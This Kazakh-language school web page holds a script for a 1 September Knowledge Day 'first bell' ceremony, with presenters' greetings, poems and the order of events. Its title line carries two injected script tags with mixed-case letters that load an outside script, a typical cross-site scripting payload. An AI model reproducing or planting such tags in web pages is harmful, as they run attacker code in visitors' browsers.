Білім күні<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

02.09.2021

 

Алғашқы қоңырау 1-қыркүйек – Білім күніне арналған салтанатты жиын

 

1- жүргізуші:     Қайырлы күн, құрметті ұстаздар, қонақтар, ата-аналар,оқушылар.

Өмір бойы мектебімді жыр етем,

Бір өзіңде бақыт, білім, берекем.

Шәкірттерің өрістесін, өрлесін,

Құтты болсын «Білім күнің »- мерекең!

2-жүргізуші:     Құрметті ұстаздар, қонақтар, ата-аналар, аяулы оқушылар! Бүгінгі сағынышқа, шатыққа толы «Алғашқы қоңырау» мерекелеріңіз құтты болсын!

 Жүздеріңнен көрем шаттық арайын,

Болсын солай әрбір күнің, әр айың.

Мерекеңіз құтты болсын ата-ана,

Мерекеңіз құтты болсын ағайын! – деп бүгінгі мереке мектеп    табалдырығын аттайын деп отырған 1-сынып бүлдіршіндеріне    арналады.

 1-жүргізуші: Біраз жылын осында өткізген,

Ұстаздар – ізгі пәк жандар.

Қуана шәкірт қабылдап,

Білімнің көшін жалғаңдар.

Алғашқы әріп үйретер,

Сейтмаганбетова Жупар Баймукашевна мен Кенжалина Рымгуль Сейлбековнаны шәкірттерімен қарсы алыңыздар!

(Музыка ырғағымен 1-сынып оқушыларын жетектеп, ұстаздары жиын өтіп жатқан алаңға шығып, ортаға 1 мәрте жүріп өтіп, арнайы дайындалған орынға келіп тұрады.)

2-жүргізуші:

Бірінші қыркүйек білім күніне арналған салтанатты жиылысымызды ашық деп жариялаймыз!

(әнұран ойналады)

1-жүргізуші: Жаңа оқу жылымен сіздерді мектеп директорының міндетін атқарушысы Кошкинова Маххаббат Ериковнаға беріледі.

Келесі сөз кезегі оқу ісінің меңгерушісі Байдалина Гульнар Бекешовнаға беріледі.

2-жүргізуші:

Ортаға 1-сыныпқа қадам тастаған бүлдіршіндер келеді,

Жүрек жарды тақпақтарын сіздерге айтып береді.

Ән.  «Мектебім» 1-сынып оқушылары

БИ

 

2015 жылы «Сауат ашу» пәніне өзгерген «Әліппе» 2021 жылы қайта қалпына келді. 

  Құттықтап білім күнімен,

Сыйланар сізге әліппе.

Бар білімнің бастауы,

Қадірлеп оны дәріпте.

(Музыка әуенімен 11-сынып оқушылары сыйлықтарын  1-сыныптарға сыйлайды)

1-жүргізуші:        Оқитын әрі жазатын,

Білімге қол созатын.

Оқушы болдың, қарағым,

Білімнің кілтін ашатын, — деп сөз кезегін балапандарын ертіп

келген  құрметті ата-аналарымызға береміз.

2-жүргізуші:      Қағылмақ , міне, әуенге бөлеп,

Қағылмақ алғаш қоңырау,

Нұр толқып жүзің, гүл толып құшақ,

Шаттыққа толсын омырау.

1-жүргізуші:   Алғашқы қоңырау соғу рәсімі 11 сынып оқушысы ___________ мен 1 сынып оқушысы ____________беріледі.

2-жүргізуші:   Бүлдіршіндер, сендерге артар міндет көп,

Көтеріңдер мектептің атын құрметтеп.

Білімнің көзін аша білсең тереңнен,

Жетелейді армандарға бұл мектеп, — деп бүгінгі «Білім күніне» арналған  мерекемізді аяқтауға рұқсат етіңіздер.

1-жүргізуші:   Осымен 1-қыркүйек білім күніне арналған мерекелік шарамыз өзі мәресіне жетті. Салтанатты жиынымызды жабық деп жариялаймыз. Білім күні құтты болсын. Еліміз аман, еліміздің беделі асқақ болсын!
Жаңа оқу жылы баршаңызға құтты болсын!

( Шәкірттерімізді 11 сынып оқушылары қолдарынан ұстап сынып бөлмелері мен мектеппен танысу сәтіне жол береміз.)
(Музыкамен сыныптарға  кіреді)

 

 

Просмотров: 523


Пікір қосу



Деректерді қолтаңбаға қосу